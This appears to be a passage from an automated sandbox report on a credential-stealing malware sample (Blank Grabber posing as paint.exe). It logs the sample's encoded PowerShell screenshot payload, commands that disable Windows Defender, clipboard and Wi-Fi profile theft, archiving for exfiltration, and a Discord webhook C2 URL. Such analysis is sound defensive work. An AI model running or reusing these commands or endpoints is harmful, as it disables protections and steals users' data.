JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\paint.exe", ParentImage: C:\Users\user\Desktop\paint.exe, ParentProcessId: 2132, ParentProcessName: paint.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7716, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\paint.exe", ParentImage: C:\Users\user\Desktop\paint.exe, ParentProcessId: 2132, ParentProcessName: paint.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'", ProcessId: 4588, ProcessName: cmd.exe
              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\paint.exe, ProcessId: 2132, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\paint.exe, ProcessId: 2132, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\paint.exe, ProcessId: 2132, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8364, TargetFilename: C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.cmdline
              Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5956, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *, ProcessId: 7908, ProcessName: rar.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3584, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 1780, ProcessName: powershell.exe

              Data Obfuscation

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

              Stealing of Sensitive Information

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\paint.exe", ParentImage: C:\Users\user\Desktop\paint.exe, ParentProcessId: 2132, ParentProcessName: paint.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7772, ProcessName: cmd.exe
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: paint.exe.2132.1.memstrminMalware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1325366706595561574/vQDeUuP3YNG10jqpqcayt14YabeOslGKlq6YRX-VMaSv1X0716_bmr9KcFyMQ8vNYrim"}
              Source: paint.exeVirustotal: Detection: 43%Perma Link
              Source: paint.exeReversingLabs: Detection: 36%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DE901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,88_2_00007FF623DE901C
              Source: paint.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669915105.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: paint.exe, 00000000.00000003.1667071030.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.0.dr
              Source: Binary string: ucrtbase.pdb source: paint.exe, 00000001.00000002.2017036529.00007FFE01431000.00000002.00000001.01000000.00000004.sdmp, ucrtbase.dll.0.dr
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: paint.exe, 00000000.00000003.1666577490.0000023393141000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668811885.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669443870.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667653632.0000023393141000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669527787.0000023393149000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667295052.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669359643.0000023393148000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: paint.exe, 00000001.00000002.2019605876.00007FFE13201000.00000040.00000001.01000000.00000007.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669443870.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668000364.0000023393147000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: paint.exe, 00000000.00000003.1666390451.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1670177591.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668921713.0000023393148000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667896960.0000023393148000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: paint.exe, 00000001.00000002.2018668375.00007FFE126EB000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668215242.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: api-ms-win-core-file-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669359643.0000023393148000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: paint.exe, 00000000.00000003.1670177591.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: paint.exe, 00000001.00000002.2015768208.00007FFDFB5D0000.00000040.00000001.01000000.00000005.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667196677.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668811885.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: paint.exe, 00000000.00000003.1668691836.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.0.dr
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667896960.0000023393148000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: paint.exe, 00000001.00000002.2020696017.00007FFE1A464000.00000002.00000001.01000000.00000006.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668427752.0000023393148000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1670060557.0000023393142000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: paint.exe, 00000000.00000003.1668113578.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.0.dr
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.pdbhP source: powershell.exe, 0000002F.00000002.1831220495.000001B38AF36000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1666577490.0000023393141000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667479832.0000023393141000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: api-ms-win-core-localization-l1-2-0.dll.0.dr
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667816772.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: paint.exe, 00000001.00000002.2019344015.00007FFE130C1000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668318561.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1666390451.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.0.dr
